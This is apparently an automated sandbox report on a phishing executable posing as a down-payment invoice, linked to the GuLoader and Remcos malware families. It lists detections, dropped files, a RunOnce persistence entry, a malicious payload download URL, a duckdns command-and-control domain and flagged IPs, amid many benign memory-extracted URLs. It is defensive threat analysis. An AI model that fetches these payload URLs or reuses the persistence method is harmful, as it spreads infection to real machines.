        -> wab.exe (started)

Antivirus / Scanner Results

Submitted file (Source | Detection | Scanner | Label)
18001787_down_payment_invoice_90002104.exe | 11% | Virustotal | -
18001787_down_payment_invoice_90002104.exe | 0% | ReversingLabs | -

Dropped files (Source | Detection | Scanner | Label)
C:\Users\user\AppData\Local\Temp\Dendrobe\Filamenterne.exe | 0% | ReversingLabs | -
C:\Users\user\AppData\Local\Temp\nskD796.tmp\System.dll | 3% | ReversingLabs | -

No Antivirus matches

Domains (Source | Detection | Scanner | Label)
gudanidevelopment.ge | 18% | Virustotal | -
geoplugin.net | 0% | Virustotal | -
ourt2949aslumes9.duckdns.org | 13% |Virustotal | -
URLs (Source | Detection | Scanner | Label). URLs ending in stray characters such as "crl0", "com06" or "der0$" are memory strings cut at ASN.1 residue from certificates; URLs such as "https://odc.offi" are truncated in memory and are left as found.
https://odc.offi | 0% | Avira URL Cloud | safe
https://www.adobe. | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Avira URL Cloud | safe
http://www.imvu.comr | 0% | Avira URL Cloud | safe
https://csp.withgoogle.com/csp/ads-programmable | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe
http://gudanidevelopment.ge/IogvoayYhe139.binSchoSvltathirchimie.com/IogvoayYhe139.bin | 100% | Avira URL Cloud | malware
https://csp.withgoogle.com/csp/ads-programmable | 0% | Virustotal | -
https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7 | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Virustotal | -
https://deff.nelreports.net/api/report?cat=msn | 0% | Virustotal | -
https://csp.withgoogle.com/csp/botguard-scs | 0% | Avira URL Cloud | safe
https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl | 0% | Avira URL Cloud | safe
https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7 | 0% | Virustotal | -
http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0 | 0% | Avira URL Cloud | safe
https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo | 0% | Avira URL Cloud | safe
https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl | 0% | Virustotal | -
https://btloader.com/tag?o=6208086025961472&upapi=true | 0% | Avira URL Cloud | safe
http://www.imvu.comata | 0% | Avira URL Cloud | safe
https://contextual.med | 0% | Avira URL Cloud | safe
https://btloader.com/tag?o=6208086025961472&upapi=true | 0% | Virustotal | -
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2 | 0% | Avira URL Cloud | safe
http://ocsp.sca1b.amazontrust.com06 | 0% | Avira URL Cloud | safe
https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo | 0% | Virustotal | -
https://csp.withgoogle.com/csp/botguard-scs | 0% | Virustotal | -
https://pki.goog/repository/0 | 0% | Virustotal | -
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Virustotal | -
http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0 | 0% | Virustotal | -
http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2 | 0% | Virustotal | -
https://pki.goog/repository/0 | 0% | Avira URL Cloud | safe
http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | Avira URL Cloud | safe
https://tpc.g | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Avira URL Cloud | safe
https://2542116.fls.doublecli | 0% | Avira URL Cloud | safe
https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | Avira URL Cloud | safe
http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | Virustotal | -
http://crl.pki.goog/gsr1/gsr1.crl0; | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0 | 0% | Avira URL Cloud | safe
https://csp.withgoogle.com/csp/report-to/botguard-scs | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Avira URL Cloud | safe
http://crl.pki.goog/gsr1/gsr1.crl0; | 0% | Virustotal | -
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0 | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Virustotal | -
http://pki.goog/repo/certs/gts1c3.der07 | 0% | Avira URL Cloud | safe
https://csp.withgoogle.com/csp/report-to/adspam-signals-scs | 0% | Avira URL Cloud | safe
https://2542116.fls.double | 0% | Avira URL Cloud | safe
https://sb.scorecardresearch.com/beacon.js | 0% | Avira URL Cloud | safe
https://csp.withgoogle.com/csp/report-to/adspam-signals-scs | 0% | Virustotal | -
https://csp.withgoogle.com/csp/report-to/botguard-scs | 0% | Virustotal | -
https://aefd.nelreports.net/api/report?cat=wsb | 0% | Avira URL Cloud | safe
http://pki.goog/gsr1/gsr1.crt02 | 0% | Avira URL Cloud | safe
http://pki.goog/repo/certs/gts1c3.der07 | 1% | Virustotal | -
https://sb.scorecardresearch.com/beacon.js | 0% | Virustotal | -
https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | Virustotal | -
http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0 | 0% | Virustotal | -
http://pki.goog/repo/certs/gts1c3.der0$ | 0% | Avira URL Cloud | safe
https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww. | 0% | Avira URL Cloud | safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:au | 0% | Avira URL Cloud | safe
http://pki.goog/gsr1/gsr1.crt02 | 0% | Virustotal | -
https://get3.adobe | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=wsb | 0% | Virustotal | -
http://pki.goog/repo/certs/gts1c3.der0$ | 0% | Virustotal | -
https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww. | 0% | Virustotal | -
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
gudanidevelopment.ge | 217.147.225.69 | true | true | - | unknown
geoplugin.net | 178.237.33.50 | true | false | - | unknown
ourt2949aslumes9.duckdns.org | unknown | unknown | true | - | unknown
URLs in memory and dropped files (Name | Source | Malicious | Antivirus Detection | Reputation)
https://odc.offi | wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.js | bhv3A27.tmp.9.dr | false | - | high
http://www.imvu.comr | wab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp; wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg | bhv3A27.tmp.9.dr | false | - | high
https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png | bhv3A27.tmp.9.dr | false | - | high
https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js | bhv3A27.tmp.9.dr | false | - | high
https://csp.withgoogle.com/csp/ads-programmable | bhv3A27.tmp.9.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://www.adobe. | wab.exe, 00000009.00000003.40250168695.00000000046B4000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.40249957635.00000000046B3000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000002.40254635212.00000000046B5000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.40251372783.00000000046B4000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.40250671986.00000000046B4000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.40249997725.00000000046B3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | wab.exe, 00000009.00000002.40252547768.0000000000306000.00000004.00000010.00020000.00000000.sdmp | false | - | high
https://aefd.nelreports.net/api/report?cat=bingaotak | bhv3A27.tmp.9.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2 | bhv3A27.tmp.9.dr | false | - | high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684 | bhv3A27.tmp.9.dr | false | - | high
https://deff.nelreports.net/api/report?cat=msn | bhv3A27.tmp.9.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://gudanidevelopment.ge/IogvoayYhe139.binSchoSvltathirchimie.com/IogvoayYhe139.bin | wab.exe, 00000007.00000002.45065735573.00000000342A0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/chrome/ | wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp; bhv3A27.tmp.9.dr | false | - | high
http://cdp.thawte.com/ThawteRSACA2018.crl0L | bhv3A27.tmp.9.dr | false | - | high
https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7 | bhv3A27.tmp.9.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://www.google.com/recaptcha/api | wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://csp.withgoogle.com/csp/botguard-scs | bhv3A27.tmp.9.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-acl | bhv3A27.tmp.9.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
https://s1.adform.net/Banners/Elements/Files/2070608/10170131/10170131.js?ADFassetID=10170131&bv=258 | bhv3A27.tmp.9.dr | false | - | high
https://www.google.com/chrome/https:// | wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp; wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0 | bhv3A27.tmp.9.dr | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://www.imvu.com/hrq | wab.exe, 0000000B.00000002.40221415732.00000000000DC000.00000004.00000010.00020000.00000000.sdmp | false | - | high
https://www.msn.com | bhv3A27.tmp.9.dr | false | - | high
https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80 | bhv3A27.tmp.9.dr | false |
                                            high
                                            https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wobhv3A27.tmp.9.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://btloader.com/tag?o=6208086025961472&upapi=truebhv3A27.tmp.9.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.imvu.comatawab.exe, 0000000B.00000002.40221938113.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3bhv3A27.tmp.9.drfalse
                                              high
                                              https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svgbhv3A27.tmp.9.drfalse
                                                high
                                                https://b1sync.zemanta.com/usersync/msn/?puid=101156F9176C6E98058F466E16B36FACbhv3A27.tmp.9.drfalse
                                                  high
                                                  https://contextual.medwab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2bhv3A27.tmp.9.drfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843bhv3A27.tmp.9.drfalse
                                                    high
                                                    http://ocsp.sca1b.amazontrust.com06bhv3A27.tmp.9.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://certs.godaddy.com/repository/1301bhv3A27.tmp.9.drfalse
                                                      high
                                                      http://www.imvu.comwab.exe, wab.exe, 0000000B.00000002.40221938113.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        high
                                                        https://contextual.media.net/checkswab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.rootca1.amazontrust.com0:bhv3A27.tmp.9.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://certs.godaddy.com/repository/0bhv3A27.tmp.9.drfalse
                                                            high
                                                            https://pki.goog/repository/0bhv3A27.tmp.9.drfalse
                                                            • 0%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://www.msn.com/bhv3A27.tmp.9.drfalse
                                                              high
                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480bhv3A27.tmp.9.drfalse
                                                                high
                                                                http://cacerts.thawte.com/ThawteRSACA2018.crt0bhv3A27.tmp.9.drfalse
                                                                  high
                                                                  http://crl.godaddy.com/gdroot-g2.crl0Fbhv3A27.tmp.9.drfalse
                                                                    high
                                                                    http://crl.rootg2.amazontrust.com/rootg2.crl0bhv3A27.tmp.9.drfalse
                                                                    • 0%, Virustotal, Browse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                      high
                                                                      https://www.msn.com/?ocid=iehpwab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240184394.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                        high
                                                                        https://cvision.media.net/new/300x300/2/45/221/3/7d5dc6a9-5325-442d-926e-f2c668b8e65e.jpg?v=9bhv3A27.tmp.9.drfalse
                                                                          high
                                                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC8cd6be4f72cf4da1aa891e7da23d144bhv3A27.tmp.9.drfalse
                                                                            high
                                                                            https://aefd.nelreports.net/api/report?cat=bingrmsbhv3A27.tmp.9.drfalse
                                                                            • 0%, Virustotal, Browse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.google.com/accounts/serviceloginwab.exefalse
                                                                              high
                                                                              http://trc.taboola.com/p3p.xmlbhv3A27.tmp.9.drfalse
                                                                                high
                                                                                https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729bhv3A27.tmp.9.drfalse
                                                                                  high
                                                                                  https://tpc.gwab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://2542116.fls.doublecliwab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platbhv3A27.tmp.9.drfalse
                                                                                  • 0%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://crl.pki.goog/gsr1/gsr1.crl0;bhv3A27.tmp.9.drfalse
                                                                                  • 0%, Virustotal, Browse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpgbhv3A27.tmp.9.drfalse
                                                                                    high
                                                                                    http://crl.godaddy.com/gdig2s1-2558.crl0bhv3A27.tmp.9.drfalse
                                                                                      high
                                                                                      http://ocsp.sectigo.com0bhv3A27.tmp.9.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://csp.withgoogle.com/csp/report-to/botguard-scsbhv3A27.tmp.9.drfalse
                                                                                      • 0%, Virustotal, Browse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.msn.com/de-ch/https://wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://certificates.godaddy.com/repository/0bhv3A27.tmp.9.drfalse
                                                                                          high
                                                                                          https://aefd.nelreports.net/api/report?cat=bingthbhv3A27.tmp.9.drfalse
                                                                                          • 0%, Virustotal, Browse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626bhv3A27.tmp.9.drfalse
                                                                                            high
                                                                                            https://eb2.3lift.com/sync?wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40240352351.0000000004DC1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                              high
                                                                                              https://acdn.adnxs.com/dmp/async_usersync.htmlbhv3A27.tmp.9.drfalse
                                                                                                high
                                                                                                https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsbhv3A27.tmp.9.drfalse
                                                                                                  high
                                                                                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0bhv3A27.tmp.9.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://csp.withgoogle.com/csp/report-to/adspam-signals-scsbhv3A27.tmp.9.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://pki.goog/repo/certs/gts1c3.der07bhv3A27.tmp.9.drfalse
                                                                                                  • 1%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                                    high
                                                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2bhv3A27.tmp.9.drfalse
                                                                                                      high
                                                                                                      https://www.google.com/pawab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.msbhv3A27.tmp.9.drfalse
                                                                                                          high
                                                                                                          https://2542116.fls.doubleclick.net/activwab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://2542116.fls.doublewab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3bhv3A27.tmp.9.drfalse
                                                                                                              high
                                                                                                              https://www.msn.com/de-ch/?ocid=iehpbhv3A27.tmp.9.drfalse
                                                                                                                high
                                                                                                                https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                                                  high
                                                                                                                  https://cdn.taboola.com/TaboolaCookieSyncScript.jsbhv3A27.tmp.9.drfalse
                                                                                                                    high
                                                                                                                    https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914bhv3A27.tmp.9.drfalse
                                                                                                                      high
                                                                                                                      https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpegbhv3A27.tmp.9.drfalse
                                                                                                                        high
                                                                                                                        https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregulabhv3A27.tmp.9.drfalse
                                                                                                                          high
                                                                                                                          https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1bhv3A27.tmp.9.drfalse
                                                                                                                            high
                                                                                                                            https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/otSDKStub.jsbhv3A27.tmp.9.drfalse
                                                                                                                              high
                                                                                                                              https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCefb91313fdae420ebbea45d8f044894bhv3A27.tmp.9.drfalse
                                                                                                                                high
                                                                                                                                https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.google.com/pagead/drt/uiwab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drfalse
                                                                                                                                    high
                                                                                                                                    https://s1.adform.net/stoat/626/s1.adform.net/bootstrap.jsbhv3A27.tmp.9.drfalse
                                                                                                                                      high
                                                                                                                                      https://sb.scorecardresearch.com/beacon.jsbhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://aefd.nelreports.net/api/report?cat=wsbbhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://pki.goog/gsr1/gsr1.crt02bhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://pki.goog/repo/certs/gts1c3.der0$bhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://sb.scorecardresearch.com/b2?c1=2&c2=3000001&cs_ucfr=1&rn=1632306836522&c7=https%3A%2F%2Fwww.bhv3A27.tmp.9.drfalse
                                                                                                                                      • 0%, Virustotal, Browse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_368%2Cw_622%2Cc_fill%2Cg_faces:aubhv3A27.tmp.9.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://get3.adobewab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs
IP               Domain                 Country       ASN    ASN Name                   Malicious
94.156.6.253     unknown                Bulgaria      43561  NET1-ASBG                  true
217.147.225.69   gudanidevelopment.ge   Georgia       20545  GRENA-ASTbilisiGeorgiaGE   true
178.237.33.50    geoplugin.net          Netherlands   8455   ATOM86-ASATOM86NL          false
Joe Sandbox Version: 38.0.0 Ammolite
Analysis ID: 1334833
Start date and time: 2023-10-31 13:17:34 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 16m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: 18001787_down_payment_invoice_90002104.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@9/18@4/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 183
• Number of non-executed functions: 325
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): spclient.wg.spotify.com
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
12:19:52 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Dominionist C:\Users\user\AppData\Local\Temp\Dendrobe\Filamenterne.exe
12:20:01 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Dominionist C:\Users\user\AppData\Local\Temp\Dendrobe\Filamenterne.exe
13:20:31 | API Interceptor | 31049940x Sleep call for process: wab.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94.156.6.253 | DHRI_kurumsal kimlik rehberi-2023.exe | malicious | GuLoader, Remcos |
94.156.6.253 | DHRI_kurumsal_kimlik_rehberi-2023.exe | malicious | GuLoader, Remcos |
94.156.6.253 | #U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe | malicious | GuLoader, Remcos |
94.156.6.253 | a.exe | malicious | GuLoader, Remcos |
94.156.6.253 | .09.2023.exe | malicious | GuLoader, Remcos |
94.156.6.253 | Documents_for_LUSAR_MSCU5480336_CC_416.exe | malicious | GuLoader, Remcos |
94.156.6.253 | PSID CA 0338-2023-24.exe | malicious | GuLoader, Remcos |
94.156.6.253 | SMGS-RCDU5010031.exe | malicious | GuLoader, Remcos |
94.156.6.253 | SecuriteInfo.com.W32.Trojan.SLJK-2619.17130.29308.exe | malicious | GuLoader, Remcos |
94.156.6.253 | PSID_CA_0338-2023-24.exe | malicious | GuLoader, Remcos |
94.156.6.253 | RC_S23_3274 Or_amento ADP 231019_5_5009.exe | malicious | GuLoader, Remcos |
